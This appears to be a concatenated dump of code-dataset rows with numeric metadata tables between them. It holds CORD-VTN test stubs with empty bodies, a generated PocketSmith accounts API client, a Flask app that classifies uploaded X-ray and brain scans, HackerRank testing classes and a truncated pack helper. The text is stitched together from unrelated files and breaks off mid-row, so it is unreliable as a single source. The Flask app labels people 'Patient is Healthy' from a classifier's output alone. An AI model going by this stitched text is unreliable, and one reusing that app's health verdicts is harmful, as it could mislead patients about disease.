(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management ip on VM.
8) Create a same virtual interface with valn tag and any local management ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Delete a br_int bridge and repeat steps 9 to 13, (it should not ping)
15) Add br_int bridge and repeat steps 9 to 13, (it should ping)
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_local_management_network_and_boot_image_connectivity_after_restarting_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management floating ip on VM.
8) Create a same virtual interface with valn tag and any local management floating ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Restart the VM in service and repeat steps 9 to 13.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_local_management_network_and_boot_image_connectivity_after_restarting_cord_onos(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management floating ip on VM.
8) Create a same virtual interface with valn tag and any local management floating ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Restart the ONOS service and repeat steps 9 to 13.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_local_management_network_and_boot_image_connectivity_after_delete_and_recreate_VM(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management floating ip on VM.
8) Create a same virtual interface with valn tag and any local management floating ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Delete and re-create a VM in service and repeat steps 9 to 13.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_local_management_network_and_boot_image_connectivity_after_delete_and_add_br_int_bridge(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management floating ip on VM.
8) Create a same virtual interface with valn tag and any local management floating ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
14) Delete a br_int bridge and repeat steps 9 to 13, (it should not ping)
15) Add br_int bridge and repeat steps 9 to 13, (it should ping)
"""
pass
| 60.287376
| 254
| 0.706683
| 41,043
| 279,854
| 4.598616
| 0.017689
| 0.02575
| 0.01812
| 0.022952
| 0.940638
| 0.934508
| 0.928834
| 0.921792
| 0.918513
| 0.913146
| 0
| 0.048421
| 0.2126
| 279,854
| 4,641
| 255
| 60.300366
| 0.808102
| 0.023316
| 0
| 0.701616
| 0
| 0.000437
| 0.107444
| 0.030205
| 0
| 0
| 0.000069
| 0
| 0.087374
| 0
| null | null | 0.04194
| 0.011359
| null | null | 0.070336
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
71f35311a5b0110b423b3da6080ba1cd2da1a375
| 25,555
|
py
|
Python
|
pocketsmith/api/accounts_api.py
|
theY4Kman/python-pocketsmith
|
4acb39269354d4bc376d6459756c9debc1d97d1d
|
[
"MIT"
] | 2
|
2020-10-12T08:54:39.000Z
|
2021-06-23T11:05:33.000Z
|
pocketsmith/api/accounts_api.py
|
theY4Kman/python-pocketsmith
|
4acb39269354d4bc376d6459756c9debc1d97d1d
|
[
"MIT"
] | 5
|
2020-10-09T21:58:04.000Z
|
2021-07-11T00:59:05.000Z
|
pocketsmith/api/accounts_api.py
|
theY4Kman/python-pocketsmith
|
4acb39269354d4bc376d6459756c9debc1d97d1d
|
[
"MIT"
] | 1
|
2021-07-03T07:35:05.000Z
|
2021-07-03T07:35:05.000Z
|
"""
PocketSmith
The public PocketSmith API # noqa: E501
The version of the OpenAPI document: 2.0+0.3.3
Contact: api@pocketsmith.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from pocketsmith.api_client import ApiClient, Endpoint as _Endpoint
from pocketsmith.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from pocketsmith.model.account import Account
from pocketsmith.model.inline_object import InlineObject
from pocketsmith.model.inline_object11 import InlineObject11
from pocketsmith.model.inline_response403 import InlineResponse403
class AccountsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.create_account_endpoint = _Endpoint(
settings={
'response_type': (Account,),
'auth': [
'developerKey'
],
'endpoint_path': '/users/{id}/accounts',
'operation_id': 'create_account',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'id',
'inline_object11',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
'inline_object11':
(InlineObject11,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
'inline_object11': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.delete_account_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'developerKey'
],
'endpoint_path': '/accounts/{id}',
'operation_id': 'delete_account',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_account_endpoint = _Endpoint(
settings={
'response_type': (Account,),
'auth': [
'developerKey'
],
'endpoint_path': '/accounts/{id}',
'operation_id': 'get_account',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.list_accounts_endpoint = _Endpoint(
settings={
'response_type': ([Account],),
'auth': [
'developerKey'
],
'endpoint_path': '/users/{id}/accounts',
'operation_id': 'list_accounts',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.list_institution_accounts_endpoint = _Endpoint(
settings={
'response_type': ([Account],),
'auth': [
'developerKey'
],
'endpoint_path': '/institutions/{id}/accounts',
'operation_id': 'list_institution_accounts',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.update_account_endpoint = _Endpoint(
settings={
'response_type': (Account,),
'auth': [
'developerKey'
],
'endpoint_path': '/accounts/{id}',
'operation_id': 'update_account',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'id',
'inline_object',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
'inline_object':
(InlineObject,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
'inline_object': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
def create_account(
self,
id,
**kwargs
):
"""Create an account in user # noqa: E501
Creates and returns an account belonging to the user by their ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account(id, async_req=True)
>>> result = thread.get()
Args:
id (int): The unique identifier of the user.
Keyword Args:
inline_object11 (InlineObject11): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Account
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.create_account_endpoint.call_with_http_info(**kwargs)
def delete_account(
self,
id,
**kwargs
):
"""Delete account # noqa: E501
Deletes an account and all its data by ID, optionally merge scenarios into another account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account(id, async_req=True)
>>> result = thread.get()
Args:
id (int): The unique identifier of the account.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.delete_account_endpoint.call_with_http_info(**kwargs)
def get_account(
self,
id,
**kwargs
):
"""Get account # noqa: E501
Gets an account by its ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account(id, async_req=True)
>>> result = thread.get()
Args:
id (int): The unique identifier of the account.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Account
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.get_account_endpoint.call_with_http_info(**kwargs)
def list_accounts(
self,
id,
**kwargs
):
"""List accounts in user # noqa: E501
Lists all accounts belonging to the user by their ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_accounts(id, async_req=True)
>>> result = thread.get()
Args:
id (int): The unique identifier of the user.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Account]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.list_accounts_endpoint.call_with_http_info(**kwargs)
def list_institution_accounts(
self,
id,
**kwargs
):
"""List accounts in institution # noqa: E501
Lists accounts belonging to an institution by its ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_institution_accounts(id, async_req=True)
>>> result = thread.get()
Args:
id (int): The unique identifier of the institution.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Account]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.list_institution_accounts_endpoint.call_with_http_info(**kwargs)
def update_account(
self,
id,
**kwargs
):
"""Update account # noqa: E501
Updates and returns an account by its ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account(id, async_req=True)
>>> result = thread.get()
Args:
id (int): The unique identifier of the account.
Keyword Args:
inline_object (InlineObject): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Account
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.update_account_endpoint.call_with_http_info(**kwargs)
| 33.669302
| 113
| 0.477441
| 2,309
| 25,555
| 5.060632
| 0.086185
| 0.033119
| 0.026701
| 0.027728
| 0.873941
| 0.867351
| 0.863671
| 0.84938
| 0.827214
| 0.820539
| 0
| 0.00562
| 0.436001
| 25,555
| 758
| 114
| 33.71372
| 0.805107
| 0.361808
| 0
| 0.664671
| 1
| 0
| 0.211287
| 0.030125
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013972
| false
| 0
| 0.015968
| 0
| 0.043912
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c04a30b7ca09d730f69f38c3a803271d7087704
| 5,093
|
py
|
Python
|
app.py
|
lalan0012/covid_test2
|
631e0b4533d653e7d567b9a76a71ee52b90aef58
|
[
"MIT"
] | null | null | null |
app.py
|
lalan0012/covid_test2
|
631e0b4533d653e7d567b9a76a71ee52b90aef58
|
[
"MIT"
] | null | null | null |
app.py
|
lalan0012/covid_test2
|
631e0b4533d653e7d567b9a76a71ee52b90aef58
|
[
"MIT"
] | null | null | null |
from flask import Flask
app = Flask(__name__,static_folder="myCSS") #,template_folder="/content/COVID-Brain-Tumour-Project/project folder")
import numpy as np
from keras.preprocessing import image
from keras.models import load_model
from flask import redirect, url_for, request, render_template, Response, jsonify, redirect
from werkzeug.utils import secure_filename
from gevent.pywsgi import WSGIServer
import os
import sys
import shutil
from flask_cors import CORS, cross_origin
import tensorflow as tf
from uuid import uuid4
cors = CORS(app, resources={r"/*": {"origins": "*"}})
y=[]
@app.route('/', methods=['GET', 'POST'])
#@cross_origin()
def index():
prediction="wait"
if request.method=="POST":
f = request.files['file']
# Save the file to ./uploads
#basepath = os.path.dirname(__file__)
image1 = secure_filename(f.filename) #os.path.join(basepath, 'uploads', secure_filename(f.filename))
f.save(image1)
#rem('.\uploads')
print("done")
print('model loading ...')
covid_model = load_model('Covid_model.h5',compile=False)
print('model loading done.')
#xray_model = load_model("/content/xrayornot_data/xrayornot_model2.h5")
test_image = image.load_img(image1,target_size=(224,224))
test_image = image.img_to_array(test_image)
test_image = np.expand_dims(test_image, axis = 0)
results = covid_model.predict(test_image)
#result = xray_model.predict(test_image)
dict={}
#if it is an xray then
if np.argmax(results, axis=1) == 0 :# and result2[0][0]>4.226988e-15:
prediction = 'High risk of COVID-19'
#return 1
dict["Disease"]=1
else:
prediction = 'Patient is Healthy'
#return 0
dict["Disease"]=0
print('===================================')
print(prediction)
print('===================================')
print("inside if")
return render_template('/covidPage.html',resultt=prediction)
else:
print("inside else")
return render_template('/covidPage.html',resultt=prediction)
@app.route('/covidPage.html', methods=['GET', 'POST'])
#@cross_origin()
def predict():
prediction="wait"
if request.method=="POST":
f = request.files['file']
# Save the file to ./uploads
#basepath = os.path.dirname(__file__)
image1 = secure_filename(f.filename) #os.path.join(basepath, 'uploads', secure_filename(f.filename))
f.save(image1)
#rem('.\uploads')
print("done")
print('model loading ...')
covid_model = load_model('Covid_model.h5',compile=False)
print('model loading done.')
#xray_model = load_model("/content/xrayornot_data/xrayornot_model2.h5")
test_image = image.load_img(image1,target_size=(224,224))
test_image = image.img_to_array(test_image)
test_image = np.expand_dims(test_image, axis = 0)
results = covid_model.predict(test_image)
#result = xray_model.predict(test_image)
dict={}
#if it is an xray then
if np.argmax(results, axis=1) == 0 :# and result2[0][0]>4.226988e-15:
prediction = 'High risk of COVID-19'
#return 1
dict["Disease"]=1
else:
prediction = 'Patient is Healthy'
#return 0
dict["Disease"]=0
print('===================================')
print(prediction)
print('===================================')
print("inside if")
return render_template('/covidPage.html',resultt=prediction)
else:
print("inside else")
return render_template('/covidPage.html',resultt=prediction)
@app.route('/brainTumourPage.html', methods=['GET', 'POST'])
#@cross_origin()
def predict2():
prediction="wait"
if request.method=="POST":
f = request.files['file']
# Save the file to ./uploads
#basepath = os.path.dirname(__file__)
image1 = secure_filename(f.filename) #os.path.join(basepath, 'uploads', secure_filename(f.filename))
f.save(image1)
#rem('.\uploads')
print("done")
print('model loading ...')
covid_model = load_model('Brain_model.h5',compile=False)
print('model loading done.')
#xray_model = load_model("/content/xrayornot_data/xrayornot_model2.h5")
test_image = image.load_img(image1,target_size=(224,224))
test_image = image.img_to_array(test_image)
test_image = np.expand_dims(test_image, axis = 0)
results = covid_model.predict(test_image)
#result = xray_model.predict(test_image)
dict={}
#if it is an xray then
if np.argmax(results, axis=1) == 0 :# and result2[0][0]>4.226988e-15:
prediction = 'High risk of brainTumour'
#return 1
dict["Disease"]=1
else:
prediction = 'Patient is Healthy'
#return 0
dict["Disease"]=0
print('===================================')
print(prediction)
print('===================================')
print("inside if")
return render_template('brainTumourPage.html',resultt=prediction)
else:
print("inside else")
return render_template('/brainTumourPage.html',resultt=prediction)
if __name__=="__main__":
#http_server = WSGIServer(('',8080),app)
#http_server.serve_forever()
app.run()
| 34.181208
| 115
| 0.648145
| 648
| 5,093
| 4.919753
| 0.203704
| 0.059285
| 0.028231
| 0.043287
| 0.814931
| 0.814931
| 0.806148
| 0.770075
| 0.770075
| 0.770075
| 0
| 0.024413
| 0.171608
| 5,093
| 148
| 116
| 34.412162
| 0.731216
| 0.223444
| 0
| 0.740741
| 0
| 0
| 0.207196
| 0.064302
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.12037
| 0
| 0.203704
| 0.222222
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c10a86aa04f246c279bbc075ad6ac069c435605
| 904
|
py
|
Python
|
30 days of code/Day_27_Testing.py
|
whitebeard4708/hackerrank
|
15c9b6d951144be34cd06adde42d9a8ecba23b14
|
[
"Apache-2.0"
] | null | null | null |
30 days of code/Day_27_Testing.py
|
whitebeard4708/hackerrank
|
15c9b6d951144be34cd06adde42d9a8ecba23b14
|
[
"Apache-2.0"
] | null | null | null |
30 days of code/Day_27_Testing.py
|
whitebeard4708/hackerrank
|
15c9b6d951144be34cd06adde42d9a8ecba23b14
|
[
"Apache-2.0"
] | null | null | null |
from random import randint, shuffle
class TestDataEmptyArray(object):
@staticmethod
def get_array():
# complete this function
return []
class TestDataUniqueValues(object):
@staticmethod
def get_array():
# complete this function
arr = [14,76,34,5,37,7,64,6,25,41,4,3,56,35,2]
return arr
@staticmethod
def get_expected_result():
# complete this function
arr = [14,76,34,5,37,7,64,6,25,41,4,3,56,35,2]
return arr.index(min(arr))
class TestDataExactlyTwoDifferentMinimums():
@staticmethod
def get_array():
# complete this function
arr = [5,7,2,45,7,2,4,6,2,2,6,7,2,23,4,7,3,7,1,6,1]
return arr
@staticmethod
def get_expected_result():
# complete this function
arr = [5,7,2,45,7,2,4,6,2,2,6,7,2,23,4,7,3,7,1,6,1]
return arr.index(min(arr))
| 21.52381
| 59
| 0.597345
| 141
| 904
| 3.780142
| 0.29078
| 0.022514
| 0.168856
| 0.172608
| 0.767355
| 0.726079
| 0.726079
| 0.726079
| 0.536585
| 0.536585
| 0
| 0.14093
| 0.262168
| 904
| 41
| 60
| 22.04878
| 0.658171
| 0.126106
| 0
| 0.782609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.217391
| false
| 0
| 0.043478
| 0.043478
| 0.608696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
9c2616d643410adc4da0cac6a83a91394eee4dd6
| 86
|
py
|
Python
|
01_Language/01_Functions/python/pack.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 3
|
2020-06-28T07:42:51.000Z
|
2021-01-15T10:32:11.000Z
|
01_Language/01_Functions/python/pack.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 9
|
2021-03-10T22:45:40.000Z
|
2022-02-27T06:53:20.000Z
|
01_Language/01_Functions/python/pack.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 1
|
2021-01-15T10:51:24.000Z
|
2021-01-15T10:51:24.000Z
|
# coding: utf-8
import struct
def pack(f, *args):
return struct.pack(f, *args)
| 10.75
| 32
| 0.639535
| 14
| 86
| 3.928571
| 0.714286
| 0.181818
| 0.327273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014706
| 0.209302
| 86
| 7
| 33
| 12.285714
| 0.794118
| 0.151163
| 0
| 0
| 0
| 0
| 0
